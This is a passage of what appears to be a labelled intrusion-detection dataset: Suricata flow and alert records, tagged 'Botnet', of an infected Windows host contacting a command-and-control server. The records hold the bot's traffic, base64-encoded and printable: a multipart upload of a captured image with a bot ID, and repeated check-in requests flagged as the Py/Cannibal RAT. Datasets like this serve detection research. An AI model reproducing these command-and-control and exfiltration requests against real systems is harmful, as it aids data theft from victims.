'UE9TVCAvYXBpL3VwbG9hZCBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTguMQ0KQ29udGVudC1MZW5ndGg6IDExNDgyNQ0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0yOTI3OWM5OTQyM2U0MTBjYmIzNzMxNDQ1YzVmYTk2Yg0KDQotLTI5Mjc5Yzk5NDIzZTQxMGNiYjM3MzE0NDVjNWZhOTZiDQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InNyYyINCg0KckJwUk4uanBnDQotLTI5Mjc5Yzk5NDIzZTQxMGNiYjM3MzE0NDVjNWZhOTZiDQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImJvdGlkIg0KDQptaXRhY3MtcGM1DQotLTI5Mjc5Yzk5NDIzZTQxMGNiYjM3MzE0NDVjNWZhOTZiDQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwbG9hZGVkIjsgZmlsZW5hbWU9InJCcFJOLmpwZyINCg0K/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAMABAADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD0aiiigAooq5LDqgv003SPJt2WMSXN7KgcqT0VQf8AP5VE6kYWv10XmaUqTqStdLzZTorQsAL6Ca3vNZ02/vMkwPbFQ5AH8QB/kKy55o7a3knlbbHGpd2xnAAyTV2kviVvUiSSbUWn5rYkoqkdWswYwXkzIMj9y/AJwC3HygkHBOAcVIt/bN5eJM+ZM0C/KeXXdkf+Otz04oEWaKoR6zYSsVWfGEaTcyMqlFxlgxGCORyOKX+17Mx78z8ttCfZ5N5OM/c27sY74xQBeoqjZ6kl5eXdusUqG3cLuaNgG+UHuBjr09OehpBrNgZWjEzFlZ0OImxuXO5c4wW4Jx1xzQBforO1DWbexhjcB5i5QqsaM3yswXM=', 'payload_printable': 'POST /api/upload HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\nContent-Length: 114825\r\nContent-Type: multipart/form-data; boundary=29279c99423e410cbb3731445c5fa96b\r\n\r\n--29279c99423e410cbb3731445c5fa96b\r\nContent-Disposition: form-data; name="src"\r\n\r\nrBpRN.jpg\r\n--29279c99423e410cbb3731445c5fa96b\r\nContent-Disposition: form-data; name="botid"\r\n\r\nmitacs-pc5\r\n--29279c99423e410cbb3731445c5fa96b\r\nContent-Disposition: form-data; name="uploaded"; filename="rBpRN.jpg"\r\n\r\n......JFIF.............C..............\n..\r................. $.\' ",#..(7),01444.\'9=82<.342...C........\r\r.2!.!22222222222222222222222222222222222222222222222222..........."......................................\n.....................}........!1A..Qa."q.2....#B...R..$3br..\n.....%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz........................................................................................................\n.....................w.......!1..AQ.aq."2...B.....#3R..br.\n.$4.%.....&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j(..\n(.......t.&..1%.....=.A..?.D.F..]...*N..t..N........5.6..$...C............I.m.......2M]..%oR$.mE...$...Z...y3 ......-.......T..l.^$..3@.)..vG.:.....h...6..U..F.s#*.\\e...9..)....{.?-.\'...N3.6..;...z..g.%.....*.w...`...........k6.V.L...."ln\\.\\...\'.q.._...\rf.......B..3|..s', 'stream': 1, 'packet': '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', 'packet_info': {'linktype': 1}} | 517 | attack | 1,248,246 |
192.168.10.14-51592-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4466892, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:25:19 | 69,837 | Friday | [{'timestamp': '2017-07-07T13:25:19.764414+0000', 'flow_id': 1534259152002122, 'pcap_cnt': 4466892, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51592, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:25:19.695370+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGO1AAIAGpDTAqAoOza6lScmIH5BusvJMnrTy61ARAQCVbAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:25:19.764414+0000', 'flow_id': 1534259152002122, 'pcap_cnt': 4466892, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51592, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:25:19.695370+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGO1AAIAGpDTAqAoOza6lScmIH5BusvJMnrTy61ARAQCVbAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 308 | attack | 1,248,331 |
192.168.10.14-51593-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4468101, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:25:29 | 89,718 | Friday | [{'timestamp': '2017-07-07T13:25:29.855743+0000', 'flow_id': 1677122649830227, 'pcap_cnt': 4468101, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51593, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:25:29.766803+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGPJAAIAGpC/AqAoOza6lScmJH5CB9bf/8PVBIVARAQAb/wAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:25:29.855743+0000', 'flow_id': 1677122649830227, 'pcap_cnt': 4468101, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51593, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:25:29.766803+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGPJAAIAGpC/AqAoOza6lScmJH5CB9bf/8PVBIVARAQAb/wAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,248,362 |
192.168.10.14-51594-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4469252, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:25:39 | 115,514 | Friday | [{'timestamp': '2017-07-07T13:25:39.972519+0000', 'flow_id': 2003634654222022, 'pcap_cnt': 4469252, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51594, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:25:39.857798+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGPdAAIAGpCrAqAoOza6lScmKH5D1Z5pr33W0lFARAQBkLAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:25:39.972519+0000', 'flow_id': 2003634654222022, 'pcap_cnt': 4469252, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51594, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:25:39.857798+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 